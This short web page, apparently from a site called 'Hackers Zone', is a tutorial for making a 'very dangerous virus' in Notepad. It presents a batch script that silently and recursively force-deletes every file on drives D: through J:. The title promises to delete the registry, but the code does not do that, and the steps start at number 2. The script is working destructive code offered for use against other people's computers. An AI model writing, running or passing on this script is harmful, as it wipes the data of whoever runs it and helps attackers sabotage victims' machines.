Delete The Entire Registry: Make A Very Dangerous Virus With Notepad (Final) by Hackers Zone
Delete The Entire Registry: Make A Very Dangerous Virus With Notepad (Final) by Hackers Zone
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .
NOW TYPE THE FOLLOWING CODE ::
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q